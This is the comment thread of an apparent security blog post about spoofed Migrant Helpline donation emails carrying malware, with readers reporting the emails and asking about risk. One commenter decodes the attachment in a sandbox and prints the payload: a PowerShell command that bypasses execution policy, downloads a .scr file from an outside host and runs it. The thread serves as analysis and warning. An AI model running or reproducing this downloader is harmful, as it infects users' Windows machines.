Comments

spoofed migrant helpline donations delivers malware — 20 Comments

  1. Hello. My elderly mother has just received the same email saying £180 has been deducted from her account. She’s opened the email but has not clicked on the reference link, she’s got Norton anti virus installed. Is there any additional action you recommend she takes. Many thanks

  2. I’ve just received one, too, claiming to be from Migrant Helpline. I haven’t opened it but the top line says “Thank you for choosing to donate to Migrant Helpline”. It’s from an address i n f o @ k o m p o n a v t . r u (have spaced it out, no spaces in actual email address). Definitely scammers, I’ve not donated to Migrant Helpline.

  3. I also received the same email but did not click on the link. I don’t know if it is a coincidence but my iPad Safari is not opening. Would this have any relevance to the above email.

    • That is going to be pure coincidence. These only affect Windows systems at this time. There is nothing in the code that suggests it will affect anything else

    • leading 0 are normally missing when the numbers are used from a database. they tend to be stored in the format of country code which in UK is 44 the number with initial 0 removed. When you dial a number from abroad, you never dial the first 0
      I don’t suppose you know where you have used that full name & phone number?

  4. Yes indeed, on many/most sites the phone number will be stored that way. Alas, I have used the same details on many sites, so can’t pinpoint the leak, I’m afraid. Ebay and paypal would certainly have them, amongst others. The email was sent to an old email address which I’ve updated in most places, so it seems likely the leak occurred a while ago, perhaps weeks or months. But that’s not definite as there are still a few sites where I haven’t changed it…

  5. I have had the same email. My name and phone number are correct on the email. My first thought was that recently but told me to change my password as their accounts using yahoo had been hacked and some personal information may have been taken. I try not to give out my full details or telephone number. Ebay and PayPal would have them though!

  6. OK, unzipped it in my sandbox.

    It’s base64 but Unicode, so you need to remove the spaces (I did this with notepad, CTRL-H)
    Copying from U A B V and end with = =
    = or == in base64 is padding. All base64 needs to be in 4 byte/character chunks.
    then ran it through http://www.motobit.com/util/base64-decoder-encoder.asp

    Decodes to:

    PowerShell -ExecutionPolicy bypass -noprofile -command (New-Object System.Net.WebClient).DownloadFile(“https://weddingvendorsnearme.com/rugby/goal”, “$env:temp\pser4reyou.scr” );Start-Process( “$env:temp\pser4reyou.scr” )

    If you want to encode/decode base64 on the fly, consider using python.
    start python
    type
    import base64
    to encode, type
    print base64.b64encode(‘your string’)
    I like doing
    print base64.b64encode(‘victim@domain.com’)
    when they base64 your email address, then paste that in instead.
    decoding is just as easy
    print base64.b64decode(‘eWVzIHlvdSBhcmUgZ2V0dGluZyBpdA==’)

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.